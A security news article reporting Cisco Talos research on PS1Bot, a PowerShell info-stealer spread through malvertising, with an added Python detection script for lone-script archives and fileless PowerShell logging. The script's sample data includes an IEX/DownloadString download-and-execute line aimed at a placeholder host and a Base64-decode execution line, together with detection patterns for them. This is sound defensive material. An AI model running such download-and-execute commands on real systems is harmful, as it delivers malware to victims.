New Malvertising Attack Spreads Crypto Stealing PS1Bot Malware

Cisco Talos researchers have discovered a dangerous new malware framework called PS1Bot. Active since early 2025, this sophisticated threat spreads through malvertising and is designed to steal cryptocurrency wallets, passwords, and other sensitive information.

Hackread.com has learned about a new, highly active cyberattack from research carried out by cybersecurity experts at Cisco Talos. Their technical blog post, shared exclusively with us, details a new type of malicious software called PS1Bot.

What is PS1Bot?

PS1Bot is a powerful and stealthy malware framework that has been very active since early 2025. It gets its name, in part, from being written in PowerShell, the scripting language and command shell built into Windows.

What makes PS1Bot so dangerous is its ability to perform multiple harmful actions. It can steal sensitive information, record what you type (a process known as keylogging), and take screenshots of your computer. It can even take over your system and stay there even after you restart your computer.

The research also highlights the malware’s particularly effective information-stealing capabilities, noting that it specifically targets passwords, browser cookies, and even cryptocurrency wallet seed phrases.

The malware is designed to be hard to detect. It relies on in-memory execution: the harmful modules are loaded and run directly in the computer’s memory rather than being written to disk as files, which leaves little for file-based antivirus scanning to inspect. Researchers also found that the malware checks whether antivirus products are installed on a system before proceeding with its full attack.

How Does it Spread?

According to Cisco Talos research, the malware is primarily spread through malicious online advertising, also known as malvertising. People searching online for common things like “medicare benefit policy manual” or “Counting Canadian Money Worksheets Pdf” might be led to a website that secretly downloads a compressed file to their computer. Inside these files is a seemingly harmless file named FULL DOCUMENT.js that, when opened, downloads and runs the PS1Bot malware.
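The delivery chain above (a downloaded archive whose only content is a script file such as FULL DOCUMENT.js) and the in-memory PowerShell execution described earlier both leave traces a defender can look for. The following Python is an added example, not code from Cisco Talos or from the article: it triages archive listings for a lone Windows script file and scans PowerShell Script Block Logging text (Event ID 4104) for download-and-execute-in-memory indicators. The sample archive and log lines are constructed here for illustration; the antivirus enumeration query (the root/SecurityCenter2 WMI class) is a common way to check for installed AV and is included as an assumption, since the article does not say how PS1Bot performs its check.

```python
import io
import os
import re
import zipfile

# Constructed sample script block texts, in the style of PowerShell Event ID 4104
# messages. They are illustrative only and are not PS1Bot samples.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem -Path C:\\Users\\alice\\Documents | Sort-Object Length",
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')",
    "$b = [Convert]::FromBase64String($p); Invoke-Expression ([Text.Encoding]::UTF8.GetString($b))",
    "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct",
    "Write-Host 'Backup complete'",
]

# Generic indicators of in-memory execution. None is malicious on its own;
# the combinations checked in classify_script_block() are what matter.
IN_MEMORY_EXEC_PATTERNS = {
    "download_string": re.compile(r"\.DownloadString\s*\(", re.I),
    "invoke_expression": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    "base64_decode": re.compile(r"FromBase64String\s*\(", re.I),
    "reflective_load": re.compile(r"\[System\.Reflection\.Assembly\]::Load\s*\(", re.I),
    # Assumed AV check technique (WMI SecurityCenter2 query), not taken from the article.
    "av_enumeration": re.compile(r"root[\\/]SecurityCenter2.*AntiVirusProduct", re.I),
}

# Windows Script Host / HTA extensions that should not be the sole content of a
# "document" archive delivered from a search result.
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta"}


def archive_is_lone_script(member_names):
    """True when an archive's only file member is a Windows script (e.g. FULL DOCUMENT.js)."""
    files = [n for n in member_names if not n.endswith("/")]
    if len(files) != 1:
        return False
    return os.path.splitext(files[0])[1].lower() in SCRIPT_EXTENSIONS


def build_constructed_zip(member_name, content=b"// placeholder content\n"):
    """Create an in-memory zip with a single member, standing in for a downloaded archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member_name, content)
    buf.seek(0)
    return buf


def triage_zip_bytes(buf):
    """Apply the lone-script rule to a zip file object without extracting anything."""
    with zipfile.ZipFile(buf) as zf:
        return archive_is_lone_script(zf.namelist())


def classify_script_block(text):
    """Return (suspicious, hits) for one script block text.

    A block is flagged when it pairs Invoke-Expression/IEX with a network download
    or a Base64 decode (classic fileless download-and-run), loads an assembly
    reflectively, or enumerates installed antivirus products.
    """
    hits = {name for name, rx in IN_MEMORY_EXEC_PATTERNS.items() if rx.search(text)}
    exec_with_payload = "invoke_expression" in hits and bool(
        {"download_string", "base64_decode"} & hits
    )
    suspicious = exec_with_payload or "reflective_load" in hits or "av_enumeration" in hits
    return suspicious, hits


def scan_script_blocks(blocks):
    """Return [(index, sorted indicator names)] for every flagged block."""
    findings = []
    for i, text in enumerate(blocks):
        suspicious, hits = classify_script_block(text)
        if suspicious:
            findings.append((i, sorted(hits)))
    return findings


if __name__ == "__main__":
    print("archive FULL DOCUMENT.js lone script:",
          triage_zip_bytes(build_constructed_zip("FULL DOCUMENT.js")))
    for idx, names in scan_script_blocks(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {idx}: {', '.join(names)}")
```

The archive rule is a cheap gateway check (a "manual" or "worksheet" that unpacks to a single .js file is worth holding for analysis), while the script block rule needs Script Block Logging enabled on endpoints. The AV enumeration query also appears in legitimate inventory scripts, so treat that indicator as a reason to look closer rather than as a verdict on its own.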

“The victim is initially delivered a compressed archive. The file names Talos observed in the wild are consistent with what is typically seen during search engine optimization (SEO) poisoning and/or malvertising campaigns, where the file name matches the keyword phrase being targeted in the campaigns.”

Cisco Talos

A Growing Threat

Cisco Talos has been tracking this campaign all year and has seen a steady flow of new versions of the malware, which suggests that the creators are constantly improving it. The researchers noted similarities between PS1Bot and other malware families, like AHK Bot and Skitnet, which suggests the same cybercriminals might be behind these different threats.

The research shows that this malware is a rapidly evolving and serious risk to anyone using the internet. To protect yourself, always be careful about what you download. Even if a file name looks familiar, like a manual or a document, be suspicious if it comes from a strange or unexpected website. Also, avoid clicking on suspicious pop-up ads and stick to reputable websites.

About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.